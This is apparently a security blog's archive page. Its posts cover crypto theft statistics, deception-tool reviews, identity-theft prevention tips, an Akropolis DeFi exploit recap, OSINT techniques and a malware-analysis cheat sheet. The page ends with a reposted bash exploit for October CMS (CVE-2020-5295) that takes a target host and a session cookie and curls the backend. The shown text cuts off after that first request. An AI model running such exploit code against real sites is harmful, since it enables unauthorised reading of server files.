Wednesday, January 15, 2025
Home Blog Page 77

Crystal Blockchain: Security Breaches And Fraud Involving Crypto Still High Despite Tech Development

0
image 2020 11 15 093511
image 2020 11 15 093511

It’s ten years since the first official cyber-terrorist attack of a crypto exchange, and despite technological advances, most cryptocurrency entities have not yet been able to develop sufficiently reliable security systems to minimize security breaches on their platforms.

Cyber-terrorists are taking more advantage of security gaps every year. Beyond security breaches, there are various types of fraudulent schemes that have provided a way for bad actors to gain value from unsuspecting victims, such as exit scams and Ponzi schemes.

Crystal has compiled a full and detailed report of all security breaches, fraudulent activity, cyber-terrorism, and scams involving cryptocurrencies between the years 2011 and 2020. 113 security attacks and 23 fraudulent schemes have so far resulted in the theft of approximately $7.6 billion worth of crypto assets in total (that’s comparable to the GDP of Monaco).

The most common locations for exchange security breaches are the United States, the United Kingdom, South Korea, Japan, and China. The largest crypto security breach thus far was the incident involving the Japanese exchange Coincheck in 2018.

The most notable type of cyber-terrorism utilizes a security breach in a crypto entity’s internal security systems, resulting in the illegal gaining of access to the crypto service hot wallets.

Over the next couple of months and years, as the number of blockchains keeps growing, and methods and technologies utilized by fraudsters continue to become more sophisticated and advanced, we can assume that the number of cyber-terrorist attacks will also continue to grow.

Bookmark
Please login to bookmarkClose

Deception tools and how they ensnare attackers

0
Attivo Networks ThreatDefend
Attivo Networks ThreatDefend

Featuring TrapX, Fidelis Deception, Attivo and Aclvio Shaddowplex

Deception tools have come a long way in a few years and can now more closely emulate real network activity and help security teams identify and stop attacks.

A few years ago, many deception technology companies were in the process of adding advanced features like cloud integration, artificial intelligence (AI) and automation to their platforms to combat increasingly advanced threats. The upgraded defences were necessary because skilled attackers were starting to unmask and circumvent classic deception tricks like dropping breadcrumbs pointing at fictitious, static assets. Today, deception technology again has the upper hand and can deploy a labyrinth of realistic looking but fake assets that act very much like the real thing.

The upgraded effort to lure and ultimately ensnare even the most advanced hackers is being led by several companies with deception platforms at the forefront of this still-emerging technology. The following are four of the most advanced and innovative deception tools available today.

Acalvio Shadowplex

The Shadowplex platform from Acalvio was designed from the ground up for use in enterprise environments. The company does not just look at typical IT devices like computers, printers and file servers as part of that potential enterprise. Shadowplex can also protect internet of things (IoT) sensors and devices, and even industrial control centers that make up much of the operational technology (OT) landscape.

In the case of both IoT and OT devices, having a layer of deception technology to protect them is critical because many have limited or no native security on their own. This also makes it a good choice for something like a healthcare environment, where it can mimic things like desktop computers alongside medical devices, luring attackers into either one, depending on their interest.

Being able to protect IoT and OT is impressive, but what is remarkable about Shadowplex is how it handles massive deception deployments at scale without using too many resources. The secret is that all the deception assets exist inside what it calls a deception farm, which can be located inside the cloud or on-premises in a virtualized server farm. To connect back to the physical network requires a series of sensors that act as the endpoint for a software tunnel. The sensors don’t need to be powerful or expensive. A £50 network appliance will work just fine, or they can also be software based and virtualized. You need one for every network segment that you are protecting.

How Shadowplex works is that virtual, deceptive assets are deployed in the network that they will be protecting. These assets can be automatically deployed based on the host environment, with Shadowplex picking a good mix of operating systems, IT, OT and IoT devices as appropriate. The deception assets can talk with one another and generate traffic, but are actually interacting only within the deception farm, with those results mimicked in the real environment.

Although they are technically facades, as soon as an adversary interacts with one, the AI-driven control center in the deception farm immediately spins the deception asset up fully, helping it to perform just like an attacker would expect a desktop, printer or industrial control device to act. It will keep the attacker busy for as long as possible, while alerting security teams about the attack. Shadowplex will also present situations to the attacker to learn more about their intentions and tactics, which is great not only for mitigating the current threat but also in keeping them out in the future.

Finally, you don’t need to be a deception expert to work with Shadowplex. Surprisingly helpful wizards in the program will do a user’s bidding in response to simple questions and direction. For such a powerful platform, having such an effortless interface is a real strength.

Attivo ThreatDefend Deception and Response Platform

Attivo was one of the first deception technology developers to add response capability to its product, and the company has pushed that even more with its new Attivo ThreatDefend Deception and Response Platform. It can now be deployed on-premises, in the cloud, in data centers or in hybrid networks. The company is constantly developing deception assets based on new devices and offers to craft unique deceptions if a customer has something exclusive inside their environment. All deployed decoys appear to be real assets that are being used within the network.

The goal of the Attivo platform is the same as other deception toolsets, which is to deploy fake assets that attackers will interact with, but which actual users will either not know about or have no cause to ever touch. Some of the decoys are a little more public than others, which can help to ferret out insider threats or snooping employees. For the most part, deception assets are designed to catch threat actors creeping through a network and trying to map out a path further inside, raise their credentials, move laterally or outright steal data.

Once an attacker interacts with one of Attivo’s deceptive assets, it does more than just generate an alert, though it does that, too. It also interacts with an attacker, sending back the kinds of responses that the invader might expect. It can activate a sandbox, so that any malware or hacking tools uploaded by an attacker go into the sandboxed environment. This not only protects the network, but also allows for examining the malware to determine the attacker’s intent and tactics.

The platform also allows administrators to take various actions, like quarantining a system that is being used as a launch platform by an attacker or expire the credentials of a compromised user. Once users begin to trust the platform, those actions can be set to happen automatically once any important threat intelligence is collected.

The Attivo Deception and Response Platform not only provides good deception technology, but also helps defenders get a jump start on their response capabilities, an important advantage in a world where seconds count.

Fidelis Deception

Managing any enterprise network is hard work. Putting a layer of fake or deceptive assets on top of that makes it even more difficult. Things can get a lot easier if users employ the Fidelis Deception platform, which automates most of the more onerous aspects of defenses based on deception.

You can walk through the process of deception asset deployment with easy-to-use wizards and drop-down menus, or simply have Fidelis automate everything. It does a great job of deploying assets that match whatever else is in the environment. It will keep monitoring a network as it evolves and expands, making suggestions as to how to mirror those changes in the deception network. For example, if a company adds a bunch of new IoT security cameras, Fidelis will detect that and offer to deploy a bunch of fake cameras with similar characteristics. It fully supports almost any IoT device and many found within OT as well.

Beyond easy deployment, Fidelis also controls its fake assets, having them communicate with one another and perform actions that a normal device of the same type would undertake. It even commences some surprisingly advanced tactics like poisoning the Address Resolution Protocol (ARP) table to make it look like deceptive assets are just as active as the real ones they are protecting.

Finally, Fidelis is unique in that it also spawns fake users that interact with deceptive assets in realistic ways. A hacker trying to determine if an asset is real will see evidence of users interacting with it and let their guard down, not knowing that the users themselves are part of the elaborate deception.

TrapX DeceptionGrid 7.0

The DeceptionGrid platform from TrapX continues to be one of the most robust deception defense programs, especially in terms of the number of realistic but fake assets that it can deploy. It’s not unusual for DeceptionGrid to deploy thousands upon thousands of fake assets on a network it is protecting, though that does not necessarily mean that each one is a fully functioning deceptive device.

The deceptive assets deployed by DeceptionGrid include normal network devices, deception tokens and active traps. Starting with the bulk of most deployments, the main deceptive assets are designed to seem like fully functioning computers or devices, and TrapX has several templates designed for specific industries like the financial sector or healthcare. It can mimic everything from an automatic teller machine to a point of sale device to almost any IoT asset. In addition, DeceptionGrid can deploy deceptive assets with complete operating systems. Called FullOS traps, they are designed to allow an attacker to believe that they are working with a real asset, while fully monitoring everything they are doing to gather threat intelligence.

Smaller but just as important are the deception tokens deployed by TrapX. Unlike the fully functional deceptive assets, tokens are simply ordinary files, configuration scripts and other kinds of lures that attackers use to gather information about the systems and networks they are trying to compromise. They won’t interact with an attacker, but will alert security teams whenever they are accessed, copied or viewed.

Active traps round out the volume of deceptive assets deployed by DeceptionGrid. These traps stream volumes of fake network traffic among themselves, with pointers and clues leading back to the rest of the deception network. Any attacker who is quietly monitoring network traffic is likely to be deceived by the bogus network stream, which will lead them right to a deceptive asset even though they probably assume it’s safe since it looks like it’s in regular and full use within the network.  

If you want to blanket your network with an army of deceptive assets for total protection, nothing can help achieve that goal better than the TrapX DeceptionGrid. It’s not exactly subtle, but there is almost no way for an attacker to successfully navigate through the complex maze of diverse deception assets that DeceptionGrid can deploy.

Bookmark
Please login to bookmarkClose

What is identity theft? and 5+ Ways to prevent it

2
idtheft
idtheft

Identity theft has taken on a whole new life in the digital age and our data has become a valuable commodity that can be monetised and used to commit fraudulent activities.

Data breaches are happening on an almost daily basis and Identity theft is the main driver behind all attacks, accounting for 65% of breaches and over 3.9 billion of the compromised data records this year. 

It’s become a big business that’s costing the global economy an estimated £3.2 trillion a year and according to recent research from Cifas, the number of identity theft victims has risen by 57% in the last year alone.

If criminals can get hold of your name, address, phone number or banking details, they can then use this information to steal your identity and commit fraud. Typically, this information will be used to open accounts, apply for loans, or they may even try to obtain a driving licence or passport using this stolen data.

Criminals may be able to gather a large amount of this information from bank statements or paper documents, but increasingly the easiest way for them to gain access to this priceless data is by going online.

It’s unbelievable how much information the criminals can extract from social media platforms or how easy we make it to break into our accounts by choosing passwords that could be hacked within minutes.

Tips To Prevent Identity Theft

Thankfully there are a number of steps you can take to keep your data safe and prevent identity theft.

1. Use strong passwords

6 Ways to Make Your Passwords More Secure Now

Creating a strong password is the first line of defence in preventing identity theft. One of the easiest ways for criminals to hack into your accounts and steal personal and financial information is to guess passwords. If they can successfully crack the password for just one of your accounts, there’s a good chance they can hack multiple accounts using the same details.

A strong password should be between 8-15 characters long, a mix of uppercase and lowercase letters and include numbers or symbols. For extra security, a passphrase can be created which is a password composed of a sentence or combination of words. The first letter of each word will form the basis of the password and letters can be substituted with numbers and symbols to make it more difficult to crack.

Lets give an example of good V bad passwords.

Corrupted100 – BAD

Corrupted123 BAD

LondonJohn100 BAD

not!C0rupt3d!()()%!100! GOOD

C0rupt3d!RiSec%!100! GOOD

L0Nd0n$John!1$0%0! GOOD

Okay – you got the idea – avoid dictionary type passwords, real world names, patterns. Use symbols in replacement of letters, symbols to follow letters etc. At the very least you should aim to have symbols at the beginning or end of your password. Passwords that don’t require any effort in memorizing are always a bad idea.

2. Check ALL social media privacy settings

4 ways to better protect your privacy in social media apps - UW–⁠Madison  Information Technology

Social Media is great for catching up with friends however by oversharing online, you can put yourself at great risk of identity theft or even a home burglary. Criminals can collect a huge amount of data about you from your social media profiles.

Whether you’re on Instagram, Facebook, Twitter or LinkedIn, check the site’s privacy policy and use security and privacy settings to control who can see your personal information. Be careful who you accept friend requests from and try not to share too much information that could reveal where you live, when you’re away on a holiday or any other personal data that could compromise your identity.

3. Avoid phishing emails online

5 Ways to Detect a Phishing Email: With Examples

The above example is of course fake. Just look at the “From” It may say PayPal.. but look further, look at the replyto address, look at the from address.

Phishing continues to be one of the most popular ways for criminals to steal personal information and commit identity fraud.

Phishing emails are carefully designed to trick you into entering confidential information such as an account number, password or date of birth by clicking on a link. The email may also include an attachment that once opened will directly infect your computer with malware.

Despite appearing legitimate, there are often a number of red flags that may point to a phishing email. These include: a mismatched URL, poor spelling and grammar, requests for sensitive information, unexpected correspondence and the use of threatening or urgent language.

4. Avoid all public Wi-Fi where possible

This is probably one of the least noted issues with privacy and or ID theft.

There’s no doubt that using public Wi-Fi is a quick, convenient, and free way to go online, however, it opens us up to a range of security risks that can ultimately lead to identity theft.

Public Wi-Fi requires no authentication to establish a network connection, allowing criminals direct access to any unsecured devices on the same open network. Unsecured Wi-Fi networks may also be used to spread malware allowing criminals unrestricted access to everything on your device. This information can, in turn, be used to commit identity fraud, or the information can be sold on to criminal third parties.

5. Check all bank statements regularly

It’s worth keeping a close eye on bank statements to make sure there are no unusual transactions on your account. To avoid detection, criminals will often make few initial debits for smaller amounts, then make a much larger debit which could ultimately clean out your bank account. If you notice any suspicious activity on your account, you should report this to your bank or financial services provider immediately.

6. Always use secure websites

HTTP vs HTTPS: What's the Difference?

The easiest way to check if the site you are on is secure is to check the URL. At the start of all web addresses, you will see either a ‘http’ or a ‘https’. Always use a site that starts with https as the ‘s’ stands for secure and ensures that all communication between your browser and the website you are visiting is encrypted. This system is not totally foolproof but it will add an extra layer of security and reduce the chance of your data falling into the wrong hands.

7. Ensure AV security software is kept up to date

Award Winning Antivirus 2020. Total Antivirus Protection for Your Digital  World - TotalAV.com

The installation of anti-virus software will help detect threats on your computer and block unauthorised users from gaining access. It’s also important to ensure that your software is regularly updated to prevent cybercriminals from gaining access to your computer through vulnerabilities in older and outdated systems. Regular software updates will ensure that you have the most up to date versions released by the manufacturer, thereby reducing your chance of attack.

8. Shred sensitive documents

Look for Local “Free Shred Days” to Safely Dispose of Sensitive Documents –  LifeSavvy

Your personal information is what identity thieves are after and gaining access to the paper copies of your bank statements, payslips or any other mail that may contain personally identifiable information is one of the easiest ways for them to steal this data. Always shred and properly dispose of any sensitive information to ensure it can’t be used to identify you and commit fraud.

Bookmark
Please login to bookmarkClose

$2 million stolen in Akropolis DeFi exploit

1
download
download

On Thursday, November 12th, the DeFi platform Akropolis–which allows users to earn interest on deposits as well as borrow–was the victim of an exploit that resulted in roughly $2 million in stolen funds. The attacker, who has not been identified yet, was able to exploit Akropolis by taking out flash loans and making use of a flaw within the Akropolis smart contract.

The attacker was able to make off with roughly $2 million worth of the stablecoin DAI by draining Akropolis’s YCurve and sUSD pools. The stolen funds are currently sitting in a wallet that has already been marked as “the Akropolis hackers wallet” 

How it happened

According to Akropolis’s post-mortem report,

The hacker created a flash-loan to borrow funds then called SavingsModule.deposit() with fake token (his own contract 0xe2307837524db8961c4541f943598654240bd62f) 

During “transferFrom” of this fake token, he executed another deposit with real 800k DAI borrowed from DyDx. 

The balance of the pool was actually increased during the first deposit and as a result, our PoolTokens were minted twice.

 Thus he was able to withdraw almost double the amount.

What’s unique about the Akropolis exploit, is that unlike many of the other DeFi projects in the space, Akropolis claims to have been independently audited twice. Regardless, Akropolis Founder and CEO Ana Andrianova says that the two attack vectors exploited to pull of this attack were missed during the audits.

Shortly after the attack took place, Akropolis, halted trading in all of its stablecoin pools, informed digital currency exchanges of the exploit, and put their development team and security specialists to work to create a patch.

The DeFi death toll rises 

Several DeFi exploits have taken place in 2020. According to blockchain analytic firm CipherTrace, DeFi related thefts and hacks are on the rise while digital currency crime, in general, is declining.

When it comes to DeFi, you must proceed with caution and thoroughly research before investing. The DeFi ecosystem is very new, which means that there are several unexplored attack vectors and bugs waiting to be exploited. To add insult to injury, several DeFi projects do not get their code-audited and launch their projects with insecure infrastructure; and as we see with the Akropolis exploit, even if the project does get its code audited, it does not guarantee that it will be bullet-proof.

Bookmark
Please login to bookmarkClose

The 4 Types of Threat Intelligence Vendors

0
threat intelligence vendors
threat intelligence vendors

Key Takeaways

  • Not all threat intelligence services and providers are created equal.
  • We can categorize threat intelligence vendors into four fairly broad categories.
  • Vendors make use of human analysts, automation, and machine learning in different ways — look for a vendor whose capabilities align with your goals.

As threat intelligence continues its rapid rise to the top of wish lists for security teams there remains considerable confusion about what you actually get when purchasing threat intelligence. There are a plethora of offerings from a variety of companies, including traditional endpoint and perimeter security players, security service providers, and a new breed of specialist threat intelligence vendors. But not all of these products are created equal and some are designed solely to answer very specific use cases.

In this post, we’ll broadly categorize some of these vendors based on the way they deliver or organize threat-related content. If you want to find out more about specific use cases for threat intelligence, including vendor capabilities, you can download a free copy of Gartner’s “Market Guide for Security Threat Intelligence Products and Services.”

So, let’s take a look at what you can get for your investment in threat intelligence and how it should be a central component in an effective information security strategy.

Human Intelligence Services and Providers

These services have their roots in the military tradition of human intelligence (HUMINT). Originally HUMINT was intelligence gathered by humans from humans, but now this process has evolved into humans collecting and analyzing data from human and machine sources to surface information on emerging and ongoing threats — in this case, cyber threats. For example, human analysts may work from an initial incident to build a picture of the techniques, tactics, and procedures (TTPs) that threat actors use to provide an intelligence report that could be useful to other organizations that could be affected.

These reports are usually rich in detail, full of indicators, and will be uploaded to an online and searchable database for users to access. The drawback with this type of intelligence is that traditionally, reports need to be researched using data manually gathered from a range of disparate sources (open web, deep web, and dark web), which means they can take significant time to produce. Time is one of the things at a premium to organizations looking to prevent themselves being the victim of a breach. Leading service providers will make use of advanced analytics and machine-learning techniques to increase the efficiency of analysts so that reports can be produced faster without losing vital context.

Threat Data Feed Providers

Threat data feeds are seen by many organizations as a starting point for a threat intelligence program as there are a number of open source feeds you can subscribe to. Data feeds provide potential threat indicators like IP addresses, domains, and file hashes.

The challenge is that, although this data arrives quickly (checking a box for real time), there’s no context to these indicators. This data on its own cannot answer vital questions: Are indicators connected to attacks on particular industries or technologies? What part do they play in a malicious infrastructure? Are they related to a specific type of malware? The only way to get this kind of vital context and actually generate relevant intelligence is to look for connections in the data, which in most cases is a very time-consuming and manual process. Vendors who can bring together feeds into a single solution and add context to data from feeds automatically will enable you to get the maximum value from this kind of threat content.

Threat Intelligence Platforms

Threat intelligence platforms help to organize many feeds of threat data (up to thousands, in fact) into single containers. The platforms let you configure alerts on the data from feeds and makes it more consumable by removing duplicate entries and enabling you to prioritize the sources of data. The most tangible advantage a platform has over using threat feeds alone is that it allows you bring in any source of threat data you have access to in a central view, and allows you to integrate this with other security products like SIEMs or incident response platforms.

However, you do still have to configure all those feeds in the first place, and there may not be any real analysis of that data before it reaches a person.

Ultimately, a threat intelligence platform will only ever be as good as the data you put into it. Without real context around indicators, security teams will struggle to investigate every single alert, quickly realize it isn’t possible, and risk not responding to alerts altogether.

Complete Threat Intelligence Solution

A complete threat intelligence solution draws together the capabilities of providers, feeds, and platforms, with all of these pieces allowing you to get the most from available intelligence. Crucially, a threat intelligence solution should collect data from a wide breadth of sources, including threat data feeds, to deliver a real-time view.

You would also expect automation and machine-learning capabilities that automatically connect the dots and add context across all of these sources to give you contextualized threat content. This kind of technology also means a solution can provide a human analyst resource, resulting in finished intelligence faster.

A complete solution like this will have the capability to centralize any source of threat data you have access to and let you customize that intelligence for integration with other parts of your security infrastructure.

The significant advantages of this approach are obvious — you can make use of technology that balances fast access to data with the context that makes for true threat intelligence, and you can stick with a single vendor who can meet your threat intelligence needs as they grow.

Bookmark
Please login to bookmarkClose

Open Source Intelligence What is it? and How Is it Used? (OSINT)

0
How to Protect your Public Data with Open Source Intelligence
How to Protect your Public Data with Open Source Intelligence

OSINT

Key Takeaways

  • Open source intelligence is derived from data and information that is available to the general public. It’s not limited to what can be found using Google, although the so-called “surface web” is an important component.
  • As valuable as open source intelligence can be, information overload is a real concern. Most of the tools and techniques used to conduct open source intelligence initiatives are designed to help security professionals (or threat actors) focus their efforts on specific areas of interest.
  • There is a dark side to open source intelligence: anything that can be found by security professionals can also be found (and used) by threat actors.
  • Having a clear strategy and framework in place for open source intelligence gathering is essential — simply looking for anything that could be interesting or useful will inevitably lead to burnout.

Of all the threat intelligence subtypes, open source intelligence (OSINT) is perhaps the most widely used, which makes sense. After all, it’s mostly free, and who can say no to that?

Unfortunately, much like the other major subtypes — human intelligence, signals intelligence, and geospatial intelligence, to name a few — open source intelligence is widely misunderstood and misused.

In this blog, we’re going to cover the fundamentals of open source intelligence, including how it’s used, and the tools and techniques that can be used to gather and analyze it.

What Is Open Source Intelligence?

Before we look at common sources and applications of open source intelligence, it’s important to understand what it actually is.

According to U.S. public law, open source intelligence:

  • Is produced from publicly available information
  • Is collected, analyzed, and disseminated in a timely manner to an appropriate audience
  • Addresses a specific intelligence requirement

The important phrase to focus on here is “publicly available.”

The term “open source” refers specifically to information that is available for public consumption. If any specialist skills, tools, or techniques are required to access a piece of information, it can’t reasonably be considered open source.

Crucially, open source information is not limited to what you can find using the major search engines. Web pages and other resources that can be found using Google certainly constitute massive sources of open source information, but they are far from the only sources.

For starters, a huge proportion of the internet (over 99 percent, according to former Google CEO Eric Schmidt) cannot be found using the major search engines. This so-called “deep web” is a mass of websites, databases, files, and more that (for a variety of reasons, including the presence of login pages or paywalls) cannot be indexed by Google, Bing, Yahoo, or any other search engine you care to think of. Despite this, much of the content of the deep web can be considered open source because it’s readily available to the public.

In addition, there’s plenty of freely accessible information online that can be found using online tools other than traditional search engines. We’ll look at this more later on, but as a simple example, tools like Shodan and Censys can be used to find IP addresses, networks, open ports, webcams, printers, and pretty much anything else that’s connected to the internet.

Information can also be considered open source if it is:

  • Published or broadcast for a public audience (for example, news media content)
  • Available to the public by request (for example, census data)
  • Available to the public by subscription or purchase (for example, industry journals)
  • Could be seen or heard by any casual observer
  • Made available at a meeting open to the public
  • Obtained by visiting any place or attending any event that is open to the public

At this point, you’re probably thinking, “Man, that’s a lot of information …”

And you’re right. We’re talking about a truly unimaginable quantity of information that is growing at a far higher rate than anybody could ever hope to keep up with. Even if we narrow the field down to a single source of information — let’s say Twitter — we’re forced to cope with hundreds of millions of new data points every day.

This, as you’ve probably gathered, is the inherent trade-off of open source intelligence.

As an analyst, having such a vast quantity of information available to you is both a blessing and a curse. On one hand, you have access to almost anything you might need — but on the other hand, you have to be able to actually find it in a never-ending torrent of data.

How Is Open Source Intelligence Used?

Now that we’ve covered the basics of open source intelligence, we can look at how it is commonly used for cybersecurity. There are two common use cases:

1. Ethical Hacking and Penetration Testing

Security professionals use open source intelligence to identify potential weaknesses in friendly networks so that they can be remediated before they are exploited by threat actors. Commonly found weaknesses include:

  • Accidental leaks of sensitive information, like through social media
  • Open ports or unsecured internet-connected devices
  • Unpatched software, such as websites running old versions of common CMS products
  • Leaked or exposed assets, such as proprietary code on pastebins

2. Identifying External Threats

As we’ve discussed many times in the past, the internet is an excellent source of insights into an organization’s most pressing threats. From identifying which new vulnerabilities are being actively exploited to intercepting threat actor “chatter” about an upcoming attack, open source intelligence enables security professionals to prioritize their time and resources to address the most significant current threats.

In most cases, this type of work requires an analyst to identify and correlate multiple data points to validate a threat before action is taken. For example, while a single threatening tweet may not be cause for concern, that same tweet would be viewed in a different light if it were tied to a threat group known to be active in a specific industry.

One of the most important things to understand about open source intelligence is that it is often used in combination with other intelligence subtypes. Intelligence from closed sources such as internal telemetry, closed dark web communities, and external intelligence-sharing communities is regularly used to filter and verify open source intelligence. There are a variety of tools available to help analysts perform these functions, which we’ll look at a bit later on.

The Dark Side of Open Source Intelligence

At this point, it’s time to address the second major issue with open source intelligence: if something is readily available to intelligence analysts, it’s also readily available to threat actors.

Threat actors use open source intelligence tools and techniques to identify potential targets and exploit weaknesses in target networks. Once a vulnerability is identified, it is often an extremely quick and simple process to exploit it and achieve a variety of malicious objectives.

This process is the main reason why so many small and medium-sized enterprises get hacked each year. It isn’t because threat groups specifically take an interest in them, but rather because vulnerabilities in their network or website architecture are found using simple open source intelligence techniques. In short, they are easy targets.

And open source intelligence doesn’t only enable technical attacks on IT systems and networks. Threat actors also seek out information about individuals and organizations that can be used to inform sophisticated social engineering campaigns using phishing (email), vishing (phone or voicemail), and SMiShing (SMS). Often, seemingly innocuous information shared through social networks and blogs can be used to develop highly convincing social engineering campaigns, which in turn are used to trick well-meaning users into compromising their organization’s network or assets.

This is why using open source intelligence for security purposes is so important — It gives you an opportunity to find and fix weaknesses in your organization’s network and remove sensitive information before a threat actor uses the same tools and techniques to exploit them.

Open Source Intelligence Techniques

Now that we’ve covered the uses of open source intelligence (both good and bad) it’s time to look at some of the techniques that can be used to gather and process open source information.

First, you must have a clear strategy and framework in place for acquiring and using open source intelligence. It’s not recommended to approach open source intelligence from the perspective of finding anything and everything that might be interesting or useful — as we’ve already discussed, the sheer volume of information available through open sources will simply overwhelm you.

Instead, you must know exactly what you’re trying to achieve — for example, to identify and remediate weaknesses in your network — and focus your energies specifically on accomplishing those goals.

Second, you must identify a set of tools and techniques for collecting and processing open source information. Once again, the volume of information available is much too great for manual processes to be even slightly effective.

Broadly speaking, collection of open source intelligence falls into two categories: passive collection and active collection.

Passive collection often involves the use of threat intelligence platforms (TIPs) to combine a variety of threat feeds into a single, easily accessible location. While this is a major step up from manual intelligence harvesting, the risk of information overload is still significant. More advanced threat intelligence solutions like Recorded Future solve this problem by using artificial intelligence, machine learning, and natural language processing to automate the process of prioritizing and dismissing alerts based on an organization’s specific needs.

In a similar manner, organized threat groups often use botnets to collect valuable information using techniques like traffic sniffing and keylogging.

On the other hand, active collection is the use of a variety of techniques to search for specific insights or information. For security professionals, this type of collection work is usually done for one of two reasons:

  1. A passively collected alert has highlighted a potential threat and further insight is required.
  2. The focus of an intelligence gathering exercise is very specific, such as a penetration testing exercise.

Open Source Intelligence Tools

To close things out, we’ll take a look at some of the most commonly used tools for collecting and processing open source intelligence.

While there are many free and useful tools available to security professionals and threat actors alike, some of the most commonly used (and abused) open source intelligence tools are search engines like Google — just not as most of us know them.

As we’ve already explained, one of the biggest issues facing security professionals is the regularity with which normal, well-meaning users accidentally leave sensitive assets and information exposed to the internet. There are a series of advanced search functions called “Google dork” queries that can be used to identify the information and assets they expose.

Google dork queries are based on the search operators used by IT professionals and hackers on a daily basis to conduct their work. Common examples include “filetype:”, which narrows search results to a specific file type, and “site:”, which only returns results from a specified website or domain.

The Public Intelligence website offers a more thorough rundown of Google dork queries, in which they give the following example search:

“sensitive but unclassified” filetype:pdf site:publicintelligence.net

If you type this search term into a search engine, it returns only PDF documents from the Public Intelligence website that contain the words “sensitive but unclassified” somewhere in the document text. As you can imagine, with hundreds of commands at their disposal, security professionals and threat actors can use similar techniques to search for almost anything.

Moving beyond search engines, there are literally hundreds of tools that can be used to identify network weaknesses or exposed assets. For example, you can use Wappalyzer to identify which technologies are used on a website, and combine the results with Sploitus or the National Vulnerability Database to determine whether any relevant vulnerabilities exist. Taking things a step further, you could use a more advanced threat intelligence solution like Recorded Future to determine whether a vulnerability is being actively exploited, or is included in any active exploit kits.

Of course, the examples given here are just a tiny fraction of what is possible using open source intelligence tools. There are a huge number of free and premium tools that can be used to find and analyze open source information, with common functionality including:

  • Metadata search
  • Code search
  • People and identity investigation
  • Phone number research
  • Email search and verification
  • Linking social media accounts
  • Image analysis
  • Geospatial research and mapping
  • Wireless network detection and packet analysis

Start With the End in Mind

Whatever your goals, open source intelligence can be tremendously valuable for all security disciplines. Ultimately, though, finding the right combination of tools and techniques for your specific needs will take time, as well as a degree of trial and error. The tools and techniques you need to identify insecure assets are not the same as those that would help you follow up on a threat alert or connect data points across a variety of sources.

The most important factor in the success of any open source intelligence initiative is the presence of a clear strategy — once you know what you’re trying to accomplish and you’ve set objectives accordingly, identifying the most useful tools and techniques will be much more achievable.

Bookmark
Please login to bookmarkClose

Ubuntu novice cheat sheet

0
ubuntuhero
ubuntuhero

Cheat sheet for Ubuntu Begginers

We’ll try to prevent copy pasting with commands, why? it actually is proven to help with memorizing a command if you type it rather that copy paste!

Bookmark
Please login to bookmarkClose

Cheat Sheet for Analyzing Malicious Software

0
BannerStart
BannerStart

This cheat sheet presents tips for analyzing and reverse-engineering malware. It outlines the steps for performing behavioral and code-level analysis of malicious software.

Overview of the Malware Analysis Process

  1. Use automated analysis sandbox tools for an initial assessment of the suspicious file.
  2. Set up a controlled, isolated laboratory in which to examine the malware specimen.
  3. Examine static properties and meta-data of the specimen for triage and early theories.
  4. Perform behavioural analysis to examine the specimen’s interactions with its environment.
  5. Perform static code analysis to further understand the specimen’s inner-workings.
  6. Perform dynamic code analysis to understand the more difficult aspects of the code.
  7. If necessary, unpack the specimen.
  8. Perform memory forensics of the infected lab system to supplement the other findings.
  9. Repeat steps 4-8 above as necessary (the order may vary) until analysis objectives are met.
  10. Document findings, save analysis artifacts and clean-up the laboratory for future analysis.

Behavioral Analysis

Ghidra for Static Code Analysis

Go to specific testinationg
Show references to selected instructionCtrl+Shift+f
Insert a comment;
Follow jump or callEnter
Return to previous locationAlt+Left
Go to next viewAlt+Right
UndoCtrl+z
Define data typet
Add a bookmarkCtrl+d
Text searchCtrl+Shift+e
Add or edit a labell
Disassemble selected valuesd

x64dbg/x32dbg for Dynamic Code Analysis

Run the codeF9
Step into/over instructionF7 / F8
Execute until selected instructionF4
Execute untill next returnCtrl+F9
Show previous/next executed instruction– / +
Return to previous view*
Go to specific expressionCtrl+g
Insert comment/label; / :
Show current function as a graphg
Find specific patternCtrl+b
Set software breakpoint on specific instructionSelect instruction » F2
Set software breakpoint on APIGo to Command prompt » SetBPX API Name
Highlight all occurrences of the keyword in disassemblerh » Click on keyword
Assemble instruction in place of selected oneSelect instruction » Spacebar
Edit data in memory or instruction opcodeSelect data or instruction » Ctrl+e
Extract API call referencesRight-click in disassembler » Search for » Current module » Intermodular calls

Unpacking Malicious Code

  • Determine whether the specimen is packed by using Detect It EasyExeinfo PEBytehistpeframe, etc.
  • To try unpacking the specimen quickly, infect the lab system and dump from memory using Scylla.
  • For more precision, find the Original Entry Point (OEP) in a debugger and dump with OllyDumpEx.
  • To find the OEP, anticipate the condition close to the end of the unpacker and set the breakpoint.
  • Try setting a memory breakpoint on the stack in the unpacker’s beginning to catch it during cleanup.
  • To get closer to the OEP, set breakpoints on APIs such as LoadLibrary, VirtualAlloc, etc.
  • To intercept process injection set breakpoints on VirtualAllocEx, WriteProcessMemory, etc.
  • If cannot dump cleanly, examine the packed specimen via dynamic code analysis while it runs.
  • Rebuild imports and other aspects of the dumped file using Scylla, Imports FixerUIFpe_unmapper.

Bypassing Other Analysis Defenses

  • Decode obfuscated strings statically using FLARExorsearchBalbuzard, etc.
  • Decode data in a debugger by setting a breakpoint after the decoding function and examining results.
  • Conceal x64dbg/x32dbg via the ScyllaHide plugin.
  • To disable anti-analysis functionality, locate and patch the defensive code using a debugger.
  • Look out for tricky jumps via TLS, SEH, RET, CALL, etc. when stepping through the code in a debugger.
  • If analyzing shellcode, use scdbg and jmp2it.
  • Disable ASLR via setdllcharacteristicsCFF Explorer.

credits: L Zeltser

Bookmark
Please login to bookmarkClose

October CMS Build 465 – Arbitrary File Read Exploit (Authenticated) 11-13

0
1 iefmc5DvydcG3i Rhixhww
1 iefmc5DvydcG3i Rhixhww

Date added: 2020-11-13

Just one of many vulns discovered on this cms.

# Exploit Title: October CMS Build 465 – Arbitrary File Read Exploit (Authenticated)
# Exploit Author: Sivanesh Ashok
# Vendor Homepage: https://octobercms.com/
# Version: Build 465 and below
# Tested on: Windows 10 / XAMPP / October CMS Build 465
# CVE: CVE-2020-5295

Code:

echo '''
Authenticated arbitrary file read exploit for October CMS <= Build 465
Tested on: v1.0.45
'''

rm /tmp/ocms_* &> /dev/null

if [[ ! `command -v recode` ]]; then
	echo -e "[!] Missing package 'recode'\n[!] Install 'recode' using the respective command to resume\n\tsudo apt install recode\n\tsudo pacman -S recode\n\tyum install recode"
	echo -e "[*] Exiting!\n"
	exit 0
fi

read -p "[*] Enter target host (with http/https): " host
echo ""
read -p "[*] Enter your cookie value: " cookie

curl -s -X GET -H "Cookie: $cookie" "$host/backend/cms" > /tmp/ocms_gethtml

